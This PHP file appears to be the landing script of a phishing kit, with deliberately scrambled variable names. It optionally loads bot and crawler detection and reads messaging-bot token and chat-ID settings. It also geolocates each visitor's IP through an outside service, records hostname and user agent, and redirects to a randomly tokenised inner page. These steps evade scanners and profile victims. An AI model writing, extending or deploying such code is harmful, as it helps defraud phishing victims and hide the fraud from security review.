<?php

require './nikks/nyner.php';

require 'baspiyen.php';
require 'pnuttyer.php';
require 'chjermac.php';

$muskerma = parse_ini_file("Plomernan.ini", true);
$kamjumera=$muskerma['crawlerdetect'];
if($kamjumera == 'on') {
require_once 'wyhnebap.php';
}
$muskerma = parse_ini_file("Plomernan.ini", true);
$lakmeran = $muskerma['viewsToken'];
$nuskerams = $muskerma['viewsChatID'];
$conteeps = getenv("REMOTE_ADDR");
$komderam = "http://ip-api.com/json/" . $conteeps;
$comfarn = curl_init();
curl_setopt($comfarn, CURLOPT_URL, $komderam);
curl_setopt($comfarn, CURLOPT_RETURNTRANSFER, true);
curl_setopt($comfarn, CURLOPT_SSL_VERIFYPEER, false);
$gymerad = curl_exec($comfarn);
curl_close($comfarn);
$ghemjos = json_decode($gymerad, true);
$balnertam = $ghemjos['country'];
$uyheram = $ghemjos['city'];
$nujfecap = $ghemjos['isp'];
$malderis = $ghemjos['regionName'];
$yhswams = gethostbyaddr($conteeps);
$khonbiet = $_SERVER['HTTP_USER_AGENT'];
function callAPI($komderam) {
    $udferaca = curl_init();
    curl_setopt($udferaca, CURLOPT_URL, $komderam);
    curl_setopt($udferaca, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($udferaca, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($udferaca, CURLOPT_SSL_VERIFYHOST, 0);
    $hepdermab = curl_exec($udferaca);
    curl_close($udferaca);
}

$hetmuser = substr(sha1(mt_rand()),1,25);
$mugerp=rand();
$mugerp=md5($mugerp);

$hntca = base64_encode(time().sha1($_SERVER['REMOTE_ADDR'].$_SERVER['HTTP_USER_AGENT']).md5(uniqid(rand(), true)));
header("Location: ./unhecas/chmorc.php?$hntca");
?>